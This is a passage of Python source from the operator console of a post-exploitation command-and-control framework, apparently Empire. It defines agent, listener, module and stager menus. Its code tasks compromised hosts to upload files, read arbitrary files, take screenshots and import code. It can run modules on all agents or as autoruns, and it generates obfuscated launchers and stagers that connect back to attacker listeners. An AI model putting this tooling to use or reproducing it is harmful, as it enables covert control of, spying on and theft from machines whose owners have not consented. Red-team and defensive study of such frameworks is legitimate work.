print(helpers.color(
"[*] Original tasked size of %s for upload: %s" % (uploadname, helpers.get_file_size(fileData)),
color="green"))
original_md5 = hashlib.md5(fileData).hexdigest()
# update the agent log with the filename and MD5
msg = "Tasked agent to upload " + parts[0] + " : " + original_md5
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# compress data before we base64
c = compress.compress()
start_crc32 = c.crc32_data(fileData)
comp_data = c.comp_data(fileData, 9)
fileData = c.build_header(comp_data, start_crc32)
# get final file size
fileData = helpers.encode_base64(fileData)
# upload packets -> "filename | script data"
if isinstance(fileData, bytes):
fileData = fileData.decode("utf-8")
data = uploadname + "|" + fileData
# dispatch this event
message = "[*] Starting upload of {}, final size {}".format(uploadname,
helpers.get_file_size(fileData))
signal = json.dumps({
'print': True,
'message': message,
'upload_name': uploadname,
'upload_md5': original_md5,
'upload_size': helpers.get_file_size(fileData)
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data)
else:
print(helpers.color("[!] Please enter a valid file path to upload"))
def do_usemodule(self, line):
"Use an Empire Python module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = "python/%s" % (line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID)
module_menu.cmdloop()
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
searchTerm = line.strip()
if searchTerm.strip() == "":
print(helpers.color("[!] Please enter a search term."))
else:
self.mainMenu.modules.search_modules(searchTerm)
def do_osx_screenshot(self, line):
"Use the python-mss module to take a screenshot, and save the image to the server. Not opsec safe"
if self.mainMenu.modules.modules['python/collection/osx/native_screenshot']:
module = self.mainMenu.modules.modules['python/collection/osx/native_screenshot']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute screenshot module
msg = "[*] Tasked agent to take a screenshot"
module_menu = ModuleMenu(self.mainMenu, 'python/collection/osx/native_screenshot')
print(helpers.color(msg, color="green"))
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# dispatch this event
message = "[*] Tasked agent to take a screenshot"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
module_menu.do_execute("")
else:
print(helpers.color("[!] python/collection/osx/screenshot module not loaded"))
def do_cat(self, line):
"View the contents of a file"
if line != "":
cmd = """
try:
output = ""
with open("%s","r") as f:
for line in f:
output += line
print(output)
except Exception as e:
print(str(e))
""" % (line)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", str(cmd))
# dispatch this event
message = "[*] Tasked agent to cat file: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'file_name': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to cat file %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_loadpymodule(self, line):
"Import zip file containing a .py module or package with an __init__.py"
path = line.strip()
# check the file ext and confirm that the path given is a file
if os.path.splitext(path)[-1] == '.zip' and os.path.isfile(path):
# open a handle to the file and save the data to a variable, zlib compress
filename = os.path.basename(path).rstrip('.zip')
open_file = open(path, 'rb')
module_data = open_file.read()
open_file.close()
# dispatch this event
message = "[*] Tasked agent to import {}, md5: {}".format(path, hashlib.md5(module_data).hexdigest())
signal = json.dumps({
'print': True,
'message': message,
'import_path': path,
'import_md5': hashlib.md5(module_data).hexdigest()
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "Tasked agent to import " + path + " : " + hashlib.md5(module_data).hexdigest()
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
c = compress.compress()
start_crc32 = c.crc32_data(module_data)
comp_data = c.comp_data(module_data, 9)
module_data = c.build_header(comp_data, start_crc32)
module_data = helpers.encode_base64(module_data)
data = filename + '|' + module_data
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_IMPORT_MODULE", data)
else:
print(helpers.color("[!] Please provide a valid zipfile path", color="red"))
def do_viewrepo(self, line):
"View the contents of a repo. if none is specified, all files will be returned"
repoName = line.strip()
# dispatch this event
message = "[*] Tasked agent to view repo contents: {}".format(repoName)
signal = json.dumps({
'print': True,
'message': message,
'repo_name': repoName
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "[*] Tasked agent to view repo contents: " + repoName
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_VIEW_MODULE", repoName)
def do_removerepo(self, line):
"Remove a repo"
repoName = line.strip()
# dispatch this event
message = "[*] Tasked agent to remove repo: {}".format(repoName)
signal = json.dumps({
'print': True,
'message': message,
'repo_name': repoName
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "[*] Tasked agent to remove repo: " + repoName
print(helpers.color(msg, color="green"))
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_REMOVE_MODULE", repoName)
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def complete_loadpymodule(self, text, line, begidx, endidx):
"Tab-complete a zip file path"
return helpers.complete_path(text, line)
def complete_pythonscript(self, text, line, begidx, endidx):
"Tab-complete a zip file path"
return helpers.complete_path(text, line)
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire Python module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx, language='python')
def complete_upload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
# def complete_updateprofile(self, text, line, begidx, endidx):
# "Tab-complete an updateprofile path"
# return helpers.complete_path(text,line)
class ListenersMenu(SubMenu):
"""
The main class used by Empire to drive the 'listener' menu.
"""
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Listener Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color('listeners', color='blue') + ') > '
# display all active listeners on menu startup
messages.display_listeners(self.mainMenu.listeners.activeListeners)
messages.display_listeners(self.mainMenu.listeners.get_inactive_listeners(), "Inactive")
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_list(self, line):
"List all active listeners (or agents)."
if line.lower().startswith('agents'):
self.mainMenu.do_list('agents ' + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("listeners"):
self.mainMenu.do_list('listeners ' + str(' '.join(line.split(' ')[1:])))
else:
self.mainMenu.do_list('listeners ' + str(line))
def do_kill(self, line):
"Kill one or all active listeners."
listenerID = line.strip()
if listenerID.lower() == 'all':
try:
choice = input(helpers.color('[>] Kill all listeners? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.kill_listener('all')
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.kill_listener(listenerID)
def do_delete(self, line):
"Delete listener(s) from the database"
listener_id = line.strip()
if listener_id.lower() == "all":
try:
choice = input(helpers.color("[>] Delete all listeners? [y/N] ", "red"))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.delete_listener("all")
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.delete_listener(listener_id)
def do_usestager(self, line):
"Use an Empire stager."
parts = line.split(' ')
if parts[0] not in self.mainMenu.stagers.stagers:
print(helpers.color("[!] Error: invalid stager module"))
elif len(parts) == 1:
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
elif len(parts) == 2:
listener = parts[1]
if not self.mainMenu.listeners.is_listener_valid(listener):
print(helpers.color("[!] Please enter a valid listener name or ID"))
else:
self.mainMenu.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
else:
print(helpers.color("[!] Error in ListenerMenu's do_userstager()"))
def do_uselistener(self, line):
"Use an Empire listener module."
parts = line.split(' ')
if parts[0] not in self.mainMenu.listeners.loadedListeners:
print(helpers.color("[!] Error: invalid listener module"))
else:
listenerMenu = ListenerMenu(self.mainMenu, parts[0])
listenerMenu.cmdloop()
def do_info(self, line):
"Display information for the given active listener."
listenerName = line.strip()
if listenerName not in self.mainMenu.listeners.activeListeners:
print(helpers.color("[!] Invalid listener name"))
else:
messages.display_active_listener(self.mainMenu.listeners.activeListeners[listenerName])
def do_launcher(self, line):
"Generate an initial launcher for a listener."
parts = line.strip().split()
if len(parts) != 2:
print(helpers.color("[!] Please enter 'launcher <language> <listenerName>'"))
return
else:
language = parts[0].lower()
listenerName = self.mainMenu.listeners.get_listener_name(parts[1])
if listenerName:
try:
# set the listener value for the launcher
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]
stager = self.mainMenu.stagers.stagers['multi/launcher']
stager.options['Listener']['Value'] = listenerName
stager.options['Language']['Value'] = language
stager.options['Base64']['Value'] = "True"
try:
stager.options['Proxy']['Value'] = listenerOptions['options']['Proxy']['Value']
stager.options['ProxyCreds']['Value'] = listenerOptions['options']['ProxyCreds']['Value']
except:
pass
if self.mainMenu.obfuscate:
stager.options['Obfuscate']['Value'] = "True"
else:
stager.options['Obfuscate']['Value'] = "False"
# dispatch this event
message = "[*] Generated launcher"
signal = json.dumps({
'print': False,
'message': message,
'options': stager.options
})
dispatcher.send(signal, sender="empire")
print(stager.generate())
except Exception as e:
print(helpers.color("[!] Error generating launcher: %s" % (e)))
else:
print(helpers.color("[!] Please enter a valid listenerName"))
def do_enable(self, line):
"Enables and starts one or all listeners."
listenerID = line.strip()
if listenerID == '':
print(helpers.color("[!] Please provide a listener name"))
elif listenerID.lower() == 'all':
try:
choice = input(helpers.color('[>] Start all listeners? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.enable_listener('all')
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.enable_listener(listenerID)
def do_disable(self, line):
"Disables (stops) one or all listeners. The listener(s) will not start automatically with Empire"
listenerID = line.strip()
if listenerID.lower() == 'all':
try:
choice = input(helpers.color('[>] Stop all listeners? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.listeners.shutdown_listener('all')
except KeyboardInterrupt:
print('')
else:
self.mainMenu.listeners.disable_listener(listenerID)
def do_edit(self, line):
"Change a listener option, will not take effect until the listener is restarted"
arguments = line.strip().split(" ")
if len(arguments) < 2:
print(helpers.color("[!] edit <listener name> <option name> <option value> (leave value blank to unset)"))
return
if len(arguments) == 2:
arguments.append("")
self.mainMenu.listeners.update_listener_options(arguments[0], arguments[1], ' '.join(arguments[2:]))
if arguments[0] in list(self.mainMenu.listeners.activeListeners.keys()):
print(helpers.color("[*] This change will not take effect until the listener is restarted"))
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
def complete_kill(self, text, line, begidx, endidx):
"Tab-complete listener names"
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_enable(self, text, line, begidx, endidx):
# tab complete for inactive listener names
inactive = self.mainMenu.listeners.get_inactive_listeners()
names = list(inactive.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_disable(self, text, line, begidx, endidx):
# tab complete for listener names
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_delete(self, text, line, begidx, endidx):
# tab complete for listener names
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_launcher(self, text, line, begidx, endidx):
"Tab-complete language types and listener names/IDs"
languages = ['powershell', 'python']
if line.split(' ')[1].lower() in languages:
# if we already have a language name, tab-complete listener names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
else:
# otherwise tab-complate the stager names
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
def complete_info(self, text, line, begidx, endidx):
"Tab-complete listener names/IDs"
# get all the listener names
names = list(self.mainMenu.listeners.activeListeners.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_uselistener(self, text, line, begidx, endidx):
"Tab-complete an uselistener command"
names = list(self.mainMenu.listeners.loadedListeners.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
class ListenerMenu(SubMenu):
def __init__(self, mainMenu, listenerName):
SubMenu.__init__(self, mainMenu)
if listenerName not in self.mainMenu.listeners.loadedListeners:
print(helpers.color("[!] Listener '%s' not currently valid!" % (listenerName)))
raise NavListeners()
self.doc_header = 'Listener Commands'
self.listener = self.mainMenu.listeners.loadedListeners[listenerName]
self.listenerName = listenerName
# set the text prompt
self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > '
def do_info(self, line):
"Display listener module options."
messages.display_listener_module(self.listener)
def do_execute(self, line):
"Execute the given listener module."
self.mainMenu.listeners.start_listener(self.listenerName, self.listener)
def do_launcher(self, line):
"Generate an initial launcher for this listener."
self.listenerName = self.listener.options['Name']['Value']
parts = line.strip().split()
if len(parts) != 1:
print(helpers.color("[!] Please enter 'launcher <language>'"))
return
try:
# set the listener value for the launcher
listenerOptions = self.mainMenu.listeners.activeListeners[self.listenerName]
stager = self.mainMenu.stagers.stagers['multi/launcher']
stager.options['Listener']['Value'] = self.listenerName
stager.options['Language']['Value'] = parts[0]
stager.options['Base64']['Value'] = "True"
try:
stager.options['Proxy']['Value'] = listenerOptions['options']['Proxy']['Value']
stager.options['ProxyCreds']['Value'] = listenerOptions['options']['ProxyCreds']['Value']
except:
pass
# dispatch this event
message = "[*] Generated launcher"
signal = json.dumps({
'print': False,
'message': message,
'options': stager.options
})
dispatcher.send(signal, sender="empire")
print(stager.generate())
except Exception as e:
print(helpers.color("[!] Error generating launcher: %s" % (e)))
def do_set(self, line):
"Set a listener option."
parts = line.split()
try:
option = parts[0]
if option not in self.listener.options:
print(helpers.color("[!] Invalid option specified."))
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.listener.options[option]['Description'].startswith("Switch."):
self.listener.options[option]['Value'] = "True"
else:
print(helpers.color("[!] Please specify an option value."))
else:
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.mainMenu.listeners.set_listener_option(self.listenerName, option, value)
except Exception as e:
print(helpers.color("[!] Error in setting listener option: %s" % (e)))
def do_unset(self, line):
"Unset a listener option."
option = line.split()[0]
if line.lower() == "all":
for option in self.listener.options:
self.listener.options[option]['Value'] = ''
if option not in self.listener.options:
print(helpers.color("[!] Invalid option specified."))
else:
self.listener.options[option]['Value'] = ''
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a listener option to set."
options = list(self.listener.options.keys())
if line.split(' ')[1].lower().endswith('path'):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith('file'):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith('host'):
return [helpers.lhost()]
elif line.split(' ')[1].lower().endswith('listener'):
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a module option to unset."
options = list(self.listener.options.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_launcher(self, text, line, begidx, endidx):
"Tab-complete language types"
languages = ['powershell', 'python']
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
class ModuleMenu(SubMenu):
"""
The main class used by Empire to drive the 'module' menu.
"""
def __init__(self, mainMenu, moduleName, agent=None):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Module Commands'
try:
# get the current module/name
self.moduleName = moduleName
self.module = self.mainMenu.modules.modules[moduleName]
# set the prompt text
self.prompt = '(Empire: ' + helpers.color(self.moduleName, color="blue") + ') > '
# if this menu is being called from an agent menu
if agent and 'Agent' in self.module.options:
# resolve the agent sessionID to a name, if applicable
agent = self.mainMenu.agents.get_agent_name_db(agent)
self.module.options['Agent']['Value'] = agent
except Exception as e:
print(helpers.color("[!] ModuleMenu() init error: %s" % (e)))
def validate_options(self, prompt):
"Ensure all required module options are completed."
# ensure all 'Required=True' options are filled in
for option, values in self.module.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
print(helpers.color("[!] Error: Required module option missing."))
return False
# 'Agent' is set for all but external/* modules
if 'Agent' in self.module.options:
sessionID = self.module.options['Agent']['Value']
try:
# if we're running this module for all agents, skip this validation
if sessionID.lower() != "all" and sessionID.lower() != "autorun":
moduleLangVersion = float(self.module.info['MinLanguageVersion'])
agent_lang_version = float(self.mainMenu.agents.get_language_version_db(sessionID))
# check if the agent/module PowerShell versions are compatible
if moduleLangVersion > agent_lang_version:
print(helpers.color(
"[!] Error: module requires language version %s but agent running version %s" % (
moduleLangVersion, agent_lang_version)))
return False
except Exception as e:
print(helpers.color("[!] Invalid module or agent language version: %s" % (e)))
return False
# check if the module needs admin privs
if self.module.info['NeedsAdmin']:
# if we're running this module for all agents, skip this validation
if sessionID.lower() != "all" and sessionID.lower() != "autorun":
if not self.mainMenu.agents.is_agent_elevated(sessionID):
print(helpers.color("[!] Error: module needs to run in an elevated context."))
return False
# if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued)
if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
try:
choice = input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red"))
if not (choice.lower() != "" and choice.lower()[0] == "y"):
return False
except KeyboardInterrupt:
print("")
return False
return True
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_reload(self, line):
"Reload the current module."
print("\n" + helpers.color("[*] Reloading module") + "\n")
# reload the specific module
self.mainMenu.modules.reload_module(self.moduleName)
# regrab the reference
self.module = self.mainMenu.modules.modules[self.moduleName]
def do_info(self, line):
"Display module options."
messages.display_module(self.moduleName, self.module)
def do_options(self, line):
"Display module options."
messages.display_module(self.moduleName, self.module)
def do_set(self, line):
"Set a module option."
parts = line.split()
try:
option = parts[0]
if option not in self.module.options:
print(helpers.color("[!] Invalid option specified."))
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.module.options[option]['Description'].startswith("Switch."):
self.module.options[option]['Value'] = "True"
else:
print(helpers.color("[!] Please specify an option value."))
else:
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.module.options[option]['Value'] = value
except:
print(helpers.color("[!] Error in setting option, likely invalid option name."))
def do_unset(self, line):
"Unset a module option."
option = line.split()[0]
if line.lower() == "all":
for option in self.module.options:
self.module.options[option]['Value'] = ''
if option not in self.module.options:
print(helpers.color("[!] Invalid option specified."))
else:
self.module.options[option]['Value'] = ''
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = line.strip().rstrip("*")
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
_agent = ''
if 'Agent' in self.module.options:
_agent = self.module.options['Agent']['Value']
line = line.strip("*")
module_menu = ModuleMenu(self.mainMenu, line, agent=_agent)
module_menu.cmdloop()
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def do_execute(self, line):
"Execute the given Empire module."
prompt = True
if line == "noprompt":
prompt = False
if not self.validate_options(prompt):
return
if self.moduleName.lower().startswith('external/'):
# external/* modules don't include an agent specification, and only have
# an execute() method
self.module.execute()
else:
agentName = self.module.options['Agent']['Value']
moduleName = self.moduleName
moduleData = self.module.generate(self.mainMenu.obfuscate, self.mainMenu.obfuscateCommand)
if not moduleData or moduleData == "":
print(helpers.color("[!] Error: module produced an empty script"))
return
############################################
## No longer needed
# try:
# moduleData = moduleData.encode('UTF-8')
# print("im awesome")
# moduleData.decode('ascii')
# except UnicodeDecodeError:
# print(helpers.color("[!] Error: module source contains non-ascii characters"))
# return
############################################print
# strip all comments from the module
moduleData = helpers.strip_powershell_comments(moduleData)
taskCommand = ""
# build the appropriate task command and module data blob
if str(self.module.info['Background']).lower() == "true":
# if this module should be run in the background
extention = self.module.info['OutputExtension']
if extention and extention != "":
# if this module needs to save its file output to the server
# format- [15 chars of prefix][5 chars extension][data]
saveFilePrefix = self.moduleName.split("/")[-1]
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
taskCommand = "TASK_CMD_JOB_SAVE"
else:
taskCommand = "TASK_CMD_JOB"
else:
# if this module is run in the foreground
extention = self.module.info['OutputExtension']
if self.module.info['OutputExtension'] and self.module.info['OutputExtension'] != "":
# if this module needs to save its file output to the server
# format- [15 chars of prefix][5 chars extension][data]
saveFilePrefix = self.moduleName.split("/")[-1][:15]
moduleData = saveFilePrefix.rjust(15) + extention.rjust(5) + moduleData
taskCommand = "TASK_CMD_WAIT_SAVE"
else:
taskCommand = "TASK_CMD_WAIT"
# if we're running the module on all modules
if agentName.lower() == "all":
try:
choice = input(helpers.color("[>] Run module on all agents? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
# signal everyone with what we're doing
message = "[*] Tasking all agents to run {}".format(self.moduleName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/all/{}".format(self.moduleName))
# actually task the agents
for agent in self.mainMenu.agents.get_agents_db():
sessionID = agent['session_id']
# set the agent's tasking in the cache
self.mainMenu.agents.add_agent_task_db(sessionID, taskCommand, moduleData)
# update the agent log
# dispatcher.send("[*] Tasked agent "+sessionID+" to run module " + self.moduleName, sender="Empire")
message = "[*] Tasked agent {} to run module {}".format(sessionID, self.moduleName)
signal = json.dumps({
'print': True,
'message': message,
'options': self.module.options
})
dispatcher.send(signal, sender="agents/{}/{}".format(sessionID, self.moduleName))
msg = "Tasked agent to run module {}".format(self.moduleName)
self.mainMenu.agents.save_agent_log(sessionID, msg)
except KeyboardInterrupt:
print("")
# set the script to be the global autorun
elif agentName.lower() == "autorun":
self.mainMenu.agents.set_autoruns_db(taskCommand, moduleData)
message = "[*] Set module {} to be global script autorun.".format(self.moduleName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents")
else:
if not self.mainMenu.agents.is_agent_present(agentName):
print(helpers.color("[!] Invalid agent name."))
else:
# set the agent's tasking in the cache
self.mainMenu.agents.add_agent_task_db(agentName, taskCommand, moduleData, moduleName=moduleName)
# update the agent log
message = "[*] Tasked agent {} to run module {}".format(agentName, self.moduleName)
signal = json.dumps({
'print': True,
'message': message,
'options': self.module.options
})
dispatcher.send(signal, sender="agents/{}/{}".format(agentName, self.moduleName))
msg = "Tasked agent to run module %s" % (self.moduleName)
self.mainMenu.agents.save_agent_log(agentName, msg)
def do_run(self, line):
"Execute the given Empire module."
self.do_execute(line)
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
if name != "" and self.mainMenu.agents.is_agent_present(name):
# resolve the passed name to a sessionID
sessionID = self.mainMenu.agents.get_agent_id_db(name)
agent_menu = AgentMenu(self.mainMenu, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a module option to set."
options = list(self.module.options.keys())
if line.split(' ')[1].lower() == "agent":
# if we're tab-completing "agent", return the agent names
agentNames = self.mainMenu.agents.get_agent_names_db() + ["all", "autorun"]
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in agentNames if s.startswith(mline)]
elif line.split(' ')[1].lower() == "listener":
# if we're tab-completing a listener name, return all the names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("path"):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith("file"):
return helpers.complete_path(text, line, arg=True)
elif line.split(' ')[1].lower().endswith("host"):
return [helpers.lhost()]
elif line.split(' ')[1].lower().endswith("language"):
languages = ['powershell', 'python']
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a module option to unset."
options = list(self.module.options.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path."
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
class StagerMenu(SubMenu):
"""
The main class used by Empire to drive the 'stager' menu.
"""
def __init__(self, mainMenu, stagerName, listener=None):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Stager Menu'
# get the current stager name
self.stagerName = stagerName
self.stager = self.mainMenu.stagers.stagers[stagerName]
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("stager/" + self.stagerName, color="blue") + ') > '
# if this menu is being called from an listener menu
if listener:
# resolve the listener ID to a name, if applicable
listener = self.mainMenu.listeners.get_listener(listener)
self.stager.options['Listener']['Value'] = listener
def validate_options(self):
"Make sure all required stager options are completed."
for option, values in self.stager.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
print(helpers.color("[!] Error: Required stager option missing."))
return False
listenerName = self.stager.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print(helpers.color("[!] Invalid listener ID or name."))
return False
return True
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_info(self, line):
"Display stager options."
messages.display_stager(self.stager)
def do_options(self, line):
"Display stager options."
messages.display_stager(self.stager)
def do_set(self, line):
"Set a stager option."
parts = line.split()
try:
option = parts[0]
if option not in self.stager.options:
print(helpers.color("[!] Invalid option specified."))
elif len(parts) == 1:
# "set OPTION"
# check if we're setting a switch
if self.stager.options[option]['Description'].startswith("Switch."):
self.stager.options[option]['Value'] = "True"
else:
print(helpers.color("[!] Please specify an option value."))
else:
# otherwise "set OPTION VALUE"
option = parts[0]
value = ' '.join(parts[1:])
if value == '""' or value == "''":
value = ""
self.stager.options[option]['Value'] = value
except:
print(helpers.color("[!] Error in setting option, likely invalid option name."))
def do_unset(self, line):
"Unset a stager option."
option = line.split()[0]
if line.lower() == "all":
for option in self.stager.options:
self.stager.options[option]['Value'] = ''
if option not in self.stager.options:
print(helpers.color("[!] Invalid option specified."))
else:
self.stager.options[option]['Value'] = ''
def do_generate(self, line):
"Generate/execute the given Empire stager."
if not self.validate_options():
return
stagerOutput = self.stager.generate()
savePath = ''
if 'OutFile' in self.stager.options:
savePath = self.stager.options['OutFile']['Value']
if savePath != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(savePath)) and os.path.dirname(savePath) != '':
os.makedirs(os.path.dirname(savePath))
# if we need to write binary output for a .dll
if ".dll" or ".bin" in savePath:
out_file = open(savePath, 'wb')
if isinstance(stagerOutput, str):
stagerOutput = stagerOutput.encode('UTF-8')
out_file.write(stagerOutput)
out_file.close()
else:
# otherwise normal output
out_file = open(savePath, 'w')
if isinstance(stagerOutput, bytes):
stagerOutput = stagerOutput.decode('latin-1')
out_file.write(stagerOutput)
out_file.close()
# if this is a bash script, make it executable
if ".sh" in savePath:
os.chmod(savePath, 777)
print("\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath)))
# dispatch this event
message = "[*] Generated stager"
signal = json.dumps({
'print': False,
'message': message,
'options': self.stager.options
})
dispatcher.send(signal, sender="empire")
else:
print(stagerOutput)
def do_execute(self, line):
"Generate/execute the given Empire stager."
self.do_generate(line)
def do_interact(self, line):
"Interact with a particular agent."
